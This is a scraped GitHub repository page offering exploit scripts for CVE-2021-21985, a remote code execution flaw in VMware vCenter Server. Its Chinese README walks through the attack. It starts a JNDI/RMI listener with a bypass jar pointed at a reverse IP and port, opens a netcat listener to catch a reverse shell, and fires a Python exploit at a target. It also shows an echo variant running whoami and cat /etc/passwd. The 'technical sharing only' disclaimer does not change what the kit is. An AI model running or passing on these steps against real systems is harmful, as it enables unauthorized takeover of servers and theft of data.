Skip to content
/ CVE-2021-21985 Public
forked from r0ckysec/CVE-2021-21985

CVE-2021-21985 VMware vCenter Server远程代码执行漏洞 EXP (更新可回显EXP)

0 stars 78 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Mr5m1th/CVE-2021-21985

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
img
img
 
 
CVE-2021-21985_echo.py
CVE-2021-21985_echo.py
 
 
CVE-2021-21985_exp.py
CVE-2021-21985_exp.py
 
 
JNDIInjection-Bypass.jar
JNDIInjection-Bypass.jar
 
 
README.md
README.md
 
 

Repository files navigation

CVE-2021-21985

CVE-2021-21985 EXP

本文以及工具仅限技术分享,严禁用于非法用途,否则产生的一切后果自行承担。

0x01 利用Tomcat RMI RCE

1. VPS启动JNDI监听 1099 端口

rmi需要bypass高版本jdk

java -jar JDNIInjection-Bypass.jar <lport> <reverse_ip> <reverse_port>

1623233465680

1623233424934

或者利用ldap协议(未测试)

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://ip:8080/#Exploit

ldap://ip:port/Exploit
2. VPS启动nc监听 8443 端口
nc -lvp 8443
3. 执行python脚本
python3 CVE-2021-21985_exp.py <target> <rmi://ip/class>
示例

help

1622714607456

RCE!

1622714842489

1622714789875

0x02 构造可回显RCE

原理:
1. 构造 xml文件
2. 压缩成zip
3. 注入SystemProperties
4. 通过getProperty获取内存中命令结果
执行CVE-2021-21985_echo.py
python3 CVE-2021-21985_echo.py https://x.x.x.x <cmd>

1622881866672

执行 whoami

1622881901956

执行 cat /etc/passwd

1622881962709

Reference

https://www.iswin.org/2021/06/02/Vcenter-Server-CVE-2021-21985-RCE-PAYLOAD/

https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985#rapid7-analysis

http://noahblog.360.cn/vcenter-cve-2021-2021-21985/

About

CVE-2021-21985 VMware vCenter Server远程代码执行漏洞 EXP (更新可回显EXP)

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%